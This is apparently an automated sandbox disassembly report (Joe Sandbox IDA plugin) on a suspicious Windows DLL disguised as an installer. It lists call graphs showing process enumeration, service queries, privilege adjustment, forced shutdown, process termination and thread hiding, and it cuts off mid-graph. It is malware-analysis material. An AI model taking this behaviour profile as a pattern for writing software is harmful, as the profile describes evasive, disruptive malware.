SetStdHandle 66488->66489 66489->66486 66490->66445 66491->66363 66493 6c0d0bbe 66492->66493 66494 6c0d0ba9 66492->66494 66504 6c0d0bb9 66493->66504 66508 6c0d0cb9 66493->66508 66530 6c0d0120 18 API calls __fassign 66494->66530 66501 6c0d0be1 66523 6c0db898 66501->66523 66503 6c0d0be7 66503->66504 66531 6c0d47bb HeapFree GetLastError __dosmaperr 66503->66531 66504->66366 66506->66365 66507->66365 66509 6c0d0cd1 66508->66509 66513 6c0d0bd3 66508->66513 66510 6c0d9c60 18 API calls 66509->66510 66509->66513 66511 6c0d0cef 66510->66511 66532 6c0dbb6c 66511->66532 66514 6c0d873e 66513->66514 66515 6c0d0bdb 66514->66515 66516 6c0d8755 66514->66516 66518 6c0d9c60 66515->66518 66516->66515 66588 6c0d47bb HeapFree GetLastError __dosmaperr 66516->66588 66519 6c0d9c81 66518->66519 66520 6c0d9c6c 66518->66520 66519->66501 66589 6c0d0120 18 API calls __fassign 66520->66589 66522 6c0d9c7c 66522->66501 66524 6c0db8be 66523->66524 66528 6c0db8a9 __dosmaperr 66523->66528 66525 6c0db8e5 66524->66525 66526 6c0db907 __dosmaperr 66524->66526 66590 6c0db9c1 66525->66590 66598 6c0d0120 18 API calls __fassign 66526->66598 66528->66503 66530->66504 66531->66504 66533 6c0dbb78 __wsopen_s 66532->66533 66534 6c0dbbca 66533->66534 66536 6c0dbc33 __dosmaperr 66533->66536 66538 6c0dbb80 __dosmaperr 66533->66538 66543 6c0e1990 EnterCriticalSection 66534->66543 66573 6c0d0120 18 API calls __fassign 66536->66573 66537 6c0dbbd0 66541 6c0dbbec __dosmaperr 66537->66541 66544 6c0dbc5e 66537->66544 66538->66513 66572 6c0dbc2b LeaveCriticalSection __wsopen_s 66541->66572 66543->66537 66545 6c0dbc80 66544->66545 66567 6c0dbc9c __dosmaperr 66544->66567 66546 6c0dbcd4 66545->66546 66548 6c0dbc84 __dosmaperr 66545->66548 66547 6c0dbce7 66546->66547 66582 6c0dac69 20 API calls __wsopen_s 66546->66582 66574 6c0dbe40 66547->66574 66581 6c0d0120 18 API calls __fassign 66548->66581 66553 6c0dbcfd 66557 6c0dbd26 66553->66557 66558 6c0dbd01 66553->66558 66554 6c0dbd3c 66555 6c0dbd95 WriteFile 66554->66555 66556 6c0dbd50 66554->66556 66559 6c0dbdb9 GetLastError 66555->66559 66555->66567 66561 6c0dbd5b 66556->66561 66562 6c0dbd85 66556->66562 66584 6c0dbeb1 43 API calls 5 library calls 66557->66584 66558->66567 66583 6c0dc25b 6 API calls __wsopen_s 66558->66583 66559->66567 66563 6c0dbd75 66561->66563 66564 6c0dbd60 66561->66564 66587 6c0dc2c3 7 API calls 2 library calls 66562->66587 66586 6c0dc487 8 API calls 3 library calls 66563->66586 66564->66567 66568 6c0dbd65 66564->66568 66567->66541 66585 6c0dc39e 7 API calls 2 library calls 66568->66585 66570 6c0dbd73 66570->66567 66572->66538 66573->66538 66575 6c0e19e5 __wsopen_s 18 API calls 66574->66575 66576 6c0dbe51 66575->66576 66577 6c0dbcf8 66576->66577 66578 6c0d49b2 __Getctype 37 API calls 66576->66578 66577->66553 66577->66554 66579 6c0dbe74 66578->66579 66579->66577 66580 6c0dbe8e GetConsoleMode 66579->66580 66580->66577 66581->66567 66582->66547 66583->66567 66584->66567 66585->66570 66586->66570 66587->66570 66588->66515 66589->66522 66591 6c0db9cd __wsopen_s 66590->66591 66599 6c0e1990 EnterCriticalSection 66591->66599 66593 6c0db9db 66595 6c0dba08 66593->66595 66600 6c0db925 66593->66600 66613 6c0dba41 LeaveCriticalSection __wsopen_s 66595->66613 66597 6c0dba2a 66597->66528 66598->66528 66599->66593 66614 6c0e15a2 66600->66614 66602 6c0db93b 66619 6c0e171f SetStdHandle __dosmaperr __wsopen_s 66602->66619 66604 6c0db935 66604->66602 66605 6c0db96d 66604->66605 66607 6c0e15a2 __wsopen_s 18 API calls 66604->66607 66605->66602 66606 6c0e15a2 __wsopen_s 18 API calls 66605->66606 66608 6c0db979 CloseHandle 66606->66608 66609 6c0db964 66607->66609 66608->66602 66610 6c0db985 GetLastError 66608->66610 66611 6c0e15a2 __wsopen_s 18 API calls 66609->66611 66610->66602 66611->66605 66612 6c0db993 __dosmaperr 66612->66595 66613->66597 66615 6c0e15af __dosmaperr 66614->66615 66617 6c0e15c4 __dosmaperr 66614->66617 66615->66604 66616 6c0e15e9 66616->66604 66617->66616 66618 6c0d0120 __fassign 18 API calls 66617->66618 66618->66615 66619->66612 66620->66213 66621->66215 66622->66217 66624 6c0c6608 66623->66624 66625 6c0c65dc 66623->66625 66627 6c0c6619 66624->66627 66644 6bf93560 32 API calls std::_Xinvalid_argument 66624->66644 66628 6c0c6601 66625->66628 66646 6bf92250 30 API calls 66625->66646 66627->66628 66645 6bf92f60 42 API calls 4 library calls 66627->66645 66628->66226 66630 6c0c67e8 66647 6bf92340 24 API calls 66630->66647 66632 6c0c67f7 66648 6c0c9379 RaiseException 66632->66648 66636 6c0c6827 66650 6bf92340 24 API calls 66636->66650 66638 6c0c683d 66651 6c0c9379 RaiseException 66638->66651 66640 6c0c6653 66640->66628 66649 6bf92250 30 API calls 66640->66649 66641->66226 66642->66226 66643->66226 66644->66627 66645->66640 66646->66630 66647->66632 66648->66640 66649->66636 66650->66638 66651->66628 66652->66235 66653->66234 66654->66235 66655->66235 66656->66235 66658 6bf9022e 66657->66658 66659 6bf904d6 66658->66659 66664 6c0d17db 66658->66664 66659->66245 66661->66246 66662->66248 66663->66250 66665 6c0d1806 66664->66665 66666 6c0d17e9 66664->66666 66665->66658 66666->66665 66667 6c0d180a 66666->66667 66668 6c0d17f6 66666->66668 66672 6c0d1a02 66667->66672 66680 6c0d0120 18 API calls __fassign 66668->66680 66673 6c0d1a0e __wsopen_s 66672->66673 66681 6c0cc5a9 EnterCriticalSection 66673->66681 66675 6c0d1a1c 66682 6c0d19bf 66675->66682 66679 6c0d183c 66679->66658 66680->66665 66681->66675 66690 6c0d85a6 66682->66690 66688 6c0d19f9 66689 6c0d1a51 LeaveCriticalSection 66688->66689 66689->66679 66691 6c0d9c60 18 API calls 66690->66691 66692 6c0d85b7 66691->66692 66707 6c0e19e5 66692->66707 66694 6c0d85bd __wsopen_s 66695 6c0d19d3 66694->66695 66712 6c0d47bb HeapFree GetLastError __dosmaperr 66694->66712 66697 6c0d183e 66695->66697 66698 6c0d186e 66697->66698 66700 6c0d1850 66697->66700 66706 6c0d8659 62 API calls 66698->66706 66699 6c0d185e 66714 6c0d0120 18 API calls __fassign 66699->66714 66700->66698 66700->66699 66701 6c0d1886 _Yarn 66700->66701 66701->66698 66703 6c0d0cb9 62 API calls 66701->66703 66704 6c0d9c60 18 API calls 66701->66704 66705 6c0dbb6c __wsopen_s 62 API calls 66701->66705 66703->66701 66704->66701 66705->66701 66706->66688 66709 6c0e19f2 66707->66709 66710 6c0e19ff 66707->66710 66708 6c0e1a0b 66708->66694 66709->66694 66710->66708 66713 6c0d0120 18 API calls __fassign 66710->66713 66712->66695 66713->66709 66714->66698 66715->66267 66716->66269 66717->66271 66718->66167 66719->66175 66720->66177 66721->66170 66722->66173 66723 6c0cef3f 66724 6c0cef4b __wsopen_s 66723->66724 66725 6c0cef5f 66724->66725 66726 6c0cef52 GetLastError ExitThread 66724->66726 66735 6c0d49b2 GetLastError 66725->66735 66731 6c0cef7b 66768 6c0ceeaa 16 API calls 2 library calls 66731->66768 66734 6c0cef9d 66736 6c0d49c9 66735->66736 66737 6c0d49cf 66735->66737 66769 6c0d6b23 6 API calls std::_Lockit::_Lockit 66736->66769 66741 6c0d49d5 SetLastError 66737->66741 66770 6c0d6b62 6 API calls std::_Lockit::_Lockit 66737->66770 66740 6c0d49ed 66740->66741 66742 6c0d49f1 66740->66742 66748 6c0d4a69 66741->66748 66749 6c0cef64 66741->66749 66771 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66742->66771 66745 6c0d49fd 66746 6c0d4a1c 66745->66746 66747 6c0d4a05 66745->66747 66774 6c0d6b62 6 API calls std::_Lockit::_Lockit 66746->66774 66772 6c0d6b62 6 API calls std::_Lockit::_Lockit 66747->66772 66777 6c0d0ac9 37 API calls std::locale::_Setgloballocale 66748->66777 66762 6c0d9d66 66749->66762 66754 6c0d4a28 66755 6c0d4a2c 66754->66755 66760 6c0d4a3d 66754->66760 66775 6c0d6b62 6 API calls std::_Lockit::_Lockit 66755->66775 66758 6c0d4a19 66758->66741 66759 6c0d4a13 66773 6c0d47bb HeapFree GetLastError __dosmaperr 66759->66773 66776 6c0d47bb HeapFree GetLastError __dosmaperr 66760->66776 66763 6c0d9d78 GetPEB 66762->66763 66764 6c0cef6f 66762->66764 66763->66764 66765 6c0d9d8b 66763->66765 66764->66731 66767 6c0d6d6f 5 API calls std::_Lockit::_Lockit 66764->66767 66778 6c0d6e18 5 API calls std::_Lockit::_Lockit 66765->66778 66767->66731 66768->66734 66769->66737 66770->66740 66771->66745 66772->66759 66773->66758 66774->66754 66775->66759 66776->66758 66778->66764 66779 6bf43d62 66781 6bf43bc0 66779->66781 66780 6bf43e8a GetCurrentThread NtSetInformationThread 66782 6bf43eea 66780->66782 66781->66780 66783 6bf5f8a3 66784 6bf5f887 66783->66784 66785 6bf602ac GetCurrentProcess TerminateProcess 66784->66785 66786 6bf602ca 66785->66786 66787 6bf53b72 66788 6c0c6a43 std::_Facet_Register 4 API calls 66787->66788 66789 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66788->66789 66790 6c0baec0 2 API calls 66789->66790 66792 6bf66ba0 104 API calls 66789->66792 66794 6bf67090 77 API calls 66789->66794 66795 6bf8e010 67 API calls 66789->66795 66796 6bf6639e 66789->66796 66800 6bf66e60 66789->66800 66790->66789 66792->66789 66794->66789 66795->66789 66810 6c0d0130 18 API calls 2 library calls 66796->66810 66801 6bf66e9f 66800->66801 66804 6bf66eb3 66801->66804 66811 6bf93560 32 API calls std::_Xinvalid_argument 66801->66811 66805 6bf66f5b 66804->66805 66813 6bf92250 30 API calls 66804->66813 66814 6bf926e0 24 API calls 4 library calls 66804->66814 66815 6c0c9379 RaiseException 66804->66815 66806 6bf66f6e 66805->66806 66812 6bf937e0 32 API calls std::_Xinvalid_argument 66805->66812 66806->66789 66811->66804 66812->66806 66813->66804 66814->66804 66815->66804 66816 6bf44b53 66817 6c0c6a43 std::_Facet_Register 4 API calls 66816->66817 66818 6bf44b5c _Yarn 66817->66818 66819 6c0baec0 2 API calls 66818->66819 66824 6bf44bae std::ios_base::_Ios_base_dtor 66819->66824 66820 6bf6639e 66997 6c0d0130 18 API calls 2 library calls 66820->66997 66822 6bf44cff 66823 6bf45164 CreateFileA CloseHandle 66828 6bf451ec 66823->66828 66824->66820 66824->66822 66824->66823 66825 6bf5245a _Yarn _strlen 66824->66825 66825->66820 66827 6c0baec0 2 API calls 66825->66827 66841 6bf52a83 std::ios_base::_Ios_base_dtor 66827->66841 66974 6c0c5120 OpenSCManagerA 66828->66974 66830 6bf4fc00 66990 6c0c5240 CreateToolhelp32Snapshot 66830->66990 66833 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66869 6bf45478 std::ios_base::_Ios_base_dtor _Yarn _strlen 66833->66869 66835 6bf537d0 Sleep 66880 6bf537e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66835->66880 66836 6c0baec0 2 API calls 66836->66869 66837 6bf663b2 66998 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 66837->66998 66838 6c0c5240 4 API calls 66856 6bf5053a 66838->66856 66839 6c0c5240 4 API calls 66861 6bf512e2 66839->66861 66841->66820 66978 6c0b0390 66841->66978 66842 6bf4ffe3 66842->66838 66847 6bf50abc 66842->66847 66843 6bf664f8 66844 6bf66ba0 104 API calls 66844->66869 66845 6bf66e60 32 API calls 66845->66869 66847->66825 66847->66839 66848 6bf67090 77 API calls 66848->66869 66849 6c0c5240 4 API calls 66849->66847 66850 6bf46722 66987 6c0c1880 25 API calls 4 library calls 66850->66987 66851 6c0c5240 4 API calls 66866 6bf51dd9 66851->66866 66852 6bf5211c 66852->66825 66855 6bf5241a 66852->66855 66853 6c0baec0 2 API calls 66853->66880 66854 6bf8e010 67 API calls 66854->66869 66857 6c0b0390 11 API calls 66855->66857 66856->66847 66856->66849 66858 6bf5244d 66857->66858 66996 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66858->66996 66860 6bf52452 Sleep 66860->66825 66861->66851 66861->66852 66873 6bf516ac 66861->66873 66862 6bf46162 66863 6bf4740b 66864 6c0c4ff0 4 API calls 66863->66864 66872 6bf4775a _strlen 66864->66872 66865 6c0c5240 4 API calls 66865->66852 66866->66852 66866->66865 66867 6bf66ba0 104 API calls 66867->66880 66868 6bf66e60 32 API calls 66868->66880 66869->66820 66869->66830 66869->66833 66869->66836 66869->66844 66869->66845 66869->66848 66869->66850 66869->66854 66869->66862 66870 6bf67090 77 API calls 66870->66880 66871 6bf8e010 67 API calls 66871->66880 66872->66820 66874 6bf47b92 66872->66874 66875 6bf47ba9 66872->66875 66878 6bf47b43 _Yarn 66872->66878 66876 6c0c6a43 std::_Facet_Register 4 API calls 66874->66876 66877 6c0c6a43 std::_Facet_Register 4 API calls 66875->66877 66876->66878 66877->66878 66879 6c0baec0 2 API calls 66878->66879 66888 6bf47be7 std::ios_base::_Ios_base_dtor 66879->66888 66880->66820 66880->66853 66880->66867 66880->66868 66880->66870 66880->66871 66881 6c0c4ff0 4 API calls 66892 6bf48a07 66881->66892 66882 6bf49d7f 66885 6c0c6a43 std::_Facet_Register 4 API calls 66882->66885 66883 6bf49d68 66884 6c0c6a43 std::_Facet_Register 4 API calls 66883->66884 66887 6bf49d18 _Yarn 66884->66887 66885->66887 66886 6bf4962c _strlen 66886->66820 66886->66882 66886->66883 66886->66887 66889 6c0baec0 2 API calls 66887->66889 66888->66820 66888->66881 66888->66886 66890 6bf48387 66888->66890 66897 6bf49dbd std::ios_base::_Ios_base_dtor 66889->66897 66891 6c0c4ff0 4 API calls 66903 6bf49120 66891->66903 66892->66891 66893 6c0c4ff0 4 API calls 66910 6bf4a215 _strlen 66893->66910 66894 6c0c4ff0 4 API calls 66896 6bf49624 66894->66896 66895 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66900 6bf4e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66895->66900 66988 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66896->66988 66897->66820 66897->66893 66897->66900 66899 6c0baec0 2 API calls 66899->66900 66900->66820 66900->66895 66900->66899 66901 6bf4f7b1 66900->66901 66902 6bf4ed02 Sleep 66900->66902 66989 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66901->66989 66922 6bf4e8c1 66902->66922 66903->66894 66905 6bf4e8dd GetCurrentProcess TerminateProcess 66905->66900 66906 6bf4a9a4 66908 6c0c6a43 std::_Facet_Register 4 API calls 66906->66908 66907 6bf4a9bb 66909 6c0c6a43 std::_Facet_Register 4 API calls 66907->66909 66917 6bf4a953 _Yarn _strlen 66908->66917 66909->66917 66910->66820 66910->66906 66910->66907 66910->66917 66911 6c0c4ff0 4 API calls 66911->66922 66912 6bf4fbb8 66913 6bf4fbe8 ExitWindowsEx Sleep 66912->66913 66913->66830 66914 6bf4f7c0 66914->66912 66915 6bf4aff0 66918 6c0c6a43 std::_Facet_Register 4 API calls 66915->66918 66916 6bf4b009 66919 6c0c6a43 std::_Facet_Register 4 API calls 66916->66919 66917->66837 66917->66915 66917->66916 66920 6bf4afa0 _Yarn 66917->66920 66918->66920 66919->66920 66921 6c0c5960 104 API calls 66920->66921 66923 6bf4b059 std::ios_base::_Ios_base_dtor _strlen 66921->66923 66922->66900 66922->66905 66922->66911 66923->66820 66924 6bf4b443 66923->66924 66925 6bf4b42c 66923->66925 66928 6bf4b3da _Yarn _strlen 66923->66928 66927 6c0c6a43 std::_Facet_Register 4 API calls 66924->66927 66926 6c0c6a43 std::_Facet_Register 4 API calls 66925->66926 66926->66928 66927->66928 66928->66837 66929 6bf4b7b7 66928->66929 66930 6bf4b79e 66928->66930 66933 6bf4b751 _Yarn 66928->66933 66932 6c0c6a43 std::_Facet_Register 4 API calls 66929->66932 66931 6c0c6a43 std::_Facet_Register 4 API calls 66930->66931 66931->66933 66932->66933 66934 6c0c5960 104 API calls 66933->66934 66935 6bf4b804 std::ios_base::_Ios_base_dtor _strlen 66934->66935 66935->66820 66936 6bf4bc26 66935->66936 66937 6bf4bc0f 66935->66937 66940 6bf4bbbd _Yarn _strlen 66935->66940 66939 6c0c6a43 std::_Facet_Register 4 API calls 66936->66939 66938 6c0c6a43 std::_Facet_Register 4 API calls 66937->66938 66938->66940 66939->66940 66940->66837 66941 6bf4c075 66940->66941 66942 6bf4c08e 66940->66942 66945 6bf4c028 _Yarn 66940->66945 66943 6c0c6a43 std::_Facet_Register 4 API calls 66941->66943 66944 6c0c6a43 std::_Facet_Register 4 API calls 66942->66944 66943->66945 66944->66945 66946 6c0c5960 104 API calls 66945->66946 66951 6bf4c0db std::ios_base::_Ios_base_dtor _strlen 66946->66951 66947 6bf4c7a5 66949 6c0c6a43 std::_Facet_Register 4 API calls 66947->66949 66948 6bf4c7bc 66950 6c0c6a43 std::_Facet_Register 4 API calls 66948->66950 66958 6bf4c753 _Yarn _strlen 66949->66958 66950->66958 66951->66820 66951->66947 66951->66948 66951->66958 66952 6bf4d406 66955 6c0c6a43 std::_Facet_Register 4 API calls 66952->66955 66953 6bf4d3ed 66954 6c0c6a43 std::_Facet_Register 4 API calls 66953->66954 66956 6bf4d39a _Yarn 66954->66956 66955->66956 66957 6c0c5960 104 API calls 66956->66957 66959 6bf4d458 std::ios_base::_Ios_base_dtor _strlen 66957->66959 66958->66837 66958->66952 66958->66953 66958->66956 66964 6bf4cb2f 66958->66964 66959->66820 66960 6bf4d8a4 66959->66960 66961 6bf4d8bb 66959->66961 66965 6bf4d852 _Yarn _strlen 66959->66965 66962 6c0c6a43 std::_Facet_Register 4 API calls 66960->66962 66963 6c0c6a43 std::_Facet_Register 4 API calls 66961->66963 66962->66965 66963->66965 66965->66837 66966 6bf4dcb6 66965->66966 66967 6bf4dccf 66965->66967 66970 6bf4dc69 _Yarn 66965->66970 66968 6c0c6a43 std::_Facet_Register 4 API calls 66966->66968 66969 6c0c6a43 std::_Facet_Register 4 API calls 66967->66969 66968->66970 66969->66970 66971 6c0c5960 104 API calls 66970->66971 66973 6bf4dd1c std::ios_base::_Ios_base_dtor 66971->66973 66972 6c0c4ff0 4 API calls 66972->66900 66973->66820 66973->66972 66975 6c0c5156 66974->66975 66976 6c0c51e8 OpenServiceA 66975->66976 66977 6c0c522f 66975->66977 66976->66975 66977->66869 66983 6c0b03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66978->66983 66979 6c0b3f5f CloseHandle 66979->66983 66980 6c0b310e CloseHandle 66980->66983 66981 6c0b251b CloseHandle 66981->66983 66982 6bf537cb 66986 6c0c5d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66982->66986 66983->66979 66983->66980 66983->66981 66983->66982 66984 6c09c1e0 WriteFile WriteFile WriteFile ReadFile 66983->66984 66999 6c09b730 66983->66999 66984->66983 66986->66835 66987->66863 66988->66886 66989->66914 66993 6c0c52a0 std::locale::_Setgloballocale 66990->66993 66991 6c0c5277 CloseHandle 66991->66993 66992 6c0c5320 Process32NextW 66992->66993 66993->66991 66993->66992 66994 6c0c53b1 66993->66994 66995 6c0c5345 Process32FirstW 66993->66995 66994->66842 66995->66993 66996->66860 66998->66843 67000 6c09b743 _Yarn __wsopen_s std::locale::_Setgloballocale 66999->67000 67001 6c09c180 67000->67001 67002 6c09bced CreateFileA 67000->67002 67004 6c09aa30 67000->67004 67001->66983 67002->67000 67007 6c09aa43 __wsopen_s std::locale::_Setgloballocale 67004->67007 67005 6c09b3e9 WriteFile 67005->67007 67006 6c09b43d WriteFile 67006->67007 67007->67005 67007->67006 67008 6c09b718 67007->67008 67009 6c09ab95 ReadFile 67007->67009 67008->67000 67009->67007 67010 6c0dcad3 67011 6c0dcae5 __dosmaperr 67010->67011 67012 6c0dcafd 67010->67012 67012->67011 67013 6c0dcb48 __dosmaperr 67012->67013 67015 6c0dcb77 67012->67015 67052 6c0d0120 18 API calls __fassign 67013->67052 67016 6c0dcb90 67015->67016 67018 6c0dcbe7 __wsopen_s 67015->67018 67019 6c0dcbab __dosmaperr 67015->67019 67017 6c0dcb95 67016->67017 67016->67019 67020 6c0e19e5 __wsopen_s 18 API calls 67017->67020 67046 6c0d47bb HeapFree GetLastError __dosmaperr 67018->67046 67045 6c0d0120 18 API calls __fassign 67019->67045 67022 6c0dcd3e 67020->67022 67025 6c0dcdb4 67022->67025 67026 6c0dcd57 GetConsoleMode 67022->67026 67023 6c0dcc07 67047 6c0d47bb HeapFree GetLastError __dosmaperr 67023->67047 67028 6c0dcdb8 ReadFile 67025->67028 67026->67025 67029 6c0dcd68 67026->67029 67031 6c0dce2c GetLastError 67028->67031 67032 6c0dcdd2 67028->67032 67029->67028 67033 6c0dcd6e ReadConsoleW 67029->67033 67030 6c0dcc0e 67042 6c0dcbc2 __dosmaperr __wsopen_s 67030->67042 67048 6c0dac69 20 API calls __wsopen_s 67030->67048 67031->67042 67032->67031 67034 6c0dcda9 67032->67034 67033->67034 67036 6c0dcd8a GetLastError 67033->67036 67038 6c0dce0e 67034->67038 67039 6c0dcdf7 67034->67039 67034->67042 67036->67042 67041 6c0dce25 67038->67041 67038->67042 67050 6c0dcefe 23 API calls 3 library calls 67039->67050 67051 6c0dd1b6 21 API calls __wsopen_s 67041->67051 67049 6c0d47bb HeapFree GetLastError __dosmaperr 67042->67049 67044 6c0dce2a 67044->67042 67045->67042 67046->67023 67047->67030 67048->67017 67049->67011 67050->67042 67051->67044 67052->67011
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: HR^
                                                          • API String ID: 4218353326-1341859651
                                                          • Opcode ID: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                                          • Instruction ID: 0a9c14aa832a8132d31c36b64bce4402c97426ecbcb0784fced2367b4b5edb65
                                                          • Opcode Fuzzy Hash: 51981b0f123c8b7fda7a072c907d1ac6849b492bf9f785bbf21bc5bb42363aff
                                                          • Instruction Fuzzy Hash: 0B74D873644B018FC728CF28C8D0695B7F3EF953147198A6DC09A8B766EB78B54ACB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }jk$;T55$L@^
                                                          • API String ID: 0-4218709813
                                                          • Opcode ID: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                                          • Instruction ID: 0687526a43a6179a4fe510fae3504aa0e3687840b62221c0f24ec427030f930b
                                                          • Opcode Fuzzy Hash: 9eeb9fc12118888add023e24d805e1bd1b3fb8948e8b8114ee175cb42479a023
                                                          • Instruction Fuzzy Hash: 553418736447018FC728CF28C8D0A95B7E3EFA5314B198A6DC0E64B765EB38B55ACB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7677 6c0c5240-6c0c5275 CreateToolhelp32Snapshot 7678 6c0c52a0-6c0c52a9 7677->7678 7679 6c0c52ab-6c0c52b0 7678->7679 7680 6c0c52e0-6c0c52e5 7678->7680 7683 6c0c5315-6c0c531a 7679->7683 7684 6c0c52b2-6c0c52b7 7679->7684 7681 6c0c52eb-6c0c52f0 7680->7681 7682 6c0c5377-6c0c53a1 call 6c0d2c05 7680->7682 7685 6c0c5277-6c0c5292 CloseHandle 7681->7685 7686 6c0c52f2-6c0c52f7 7681->7686 7682->7678 7687 6c0c53a6-6c0c53ab 7683->7687 7688 6c0c5320-6c0c5332 Process32NextW 7683->7688 7690 6c0c52b9-6c0c52be 7684->7690 7691 6c0c5334-6c0c535d call 6c0cb920 Process32FirstW 7684->7691 7685->7678 7686->7678 7692 6c0c52f9-6c0c5313 7686->7692 7687->7678 7696 6c0c53b1-6c0c53bf 7687->7696 7693 6c0c5362-6c0c5372 7688->7693 7690->7678 7697 6c0c52c0-6c0c52d1 7690->7697 7691->7693 7692->7678 7693->7678 7697->7678
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0C524E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                                          • Instruction ID: 9df2e85a24ed6d71813130110880076a77d390e34ee64ce851a09314e2004afe
                                                          • Opcode Fuzzy Hash: e81d5a4d67b33feb007b59dc6c1b475563b2b48c3b12260d0d77bced9dcf7dfe
                                                          • Instruction Fuzzy Hash: 5F314978608300AFD7109F28C888B1EBBF4AF9A744F90492EF598C7360D3719848AB53

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7821 6bf43886-6bf4388e 7822 6bf43894-6bf43896 7821->7822 7823 6bf43970-6bf4397d 7821->7823 7822->7823 7824 6bf4389c-6bf438b9 7822->7824 7825 6bf439f1-6bf439f8 7823->7825 7826 6bf4397f-6bf43989 7823->7826 7830 6bf438c0-6bf438c1 7824->7830 7828 6bf43ab5-6bf43aba 7825->7828 7829 6bf439fe-6bf43a03 7825->7829 7826->7824 7827 6bf4398f-6bf43994 7826->7827 7831 6bf43b16-6bf43b18 7827->7831 7832 6bf4399a-6bf4399f 7827->7832 7828->7824 7836 6bf43ac0-6bf43ac7 7828->7836 7833 6bf438d2-6bf438d4 7829->7833 7834 6bf43a09-6bf43a2f 7829->7834 7835 6bf4395e 7830->7835 7831->7830 7837 6bf439a5-6bf439bf 7832->7837 7838 6bf4383b-6bf43855 call 6c091470 call 6c091480 7832->7838 7841 6bf43957-6bf4395c 7833->7841 7839 6bf43a35-6bf43a3a 7834->7839 7840 6bf438f8-6bf43955 7834->7840 7843 6bf43960-6bf43964 7835->7843 7836->7830 7842 6bf43acd-6bf43ad6 7836->7842 7844 6bf43a5a-6bf43a5d 7837->7844 7847 6bf43860-6bf43885 7838->7847 7845 6bf43a40-6bf43a57 7839->7845 7846 6bf43b1d-6bf43b22 7839->7846 7840->7841 7841->7835 7842->7831 7849 6bf43ad8-6bf43aeb 7842->7849 7843->7847 7848 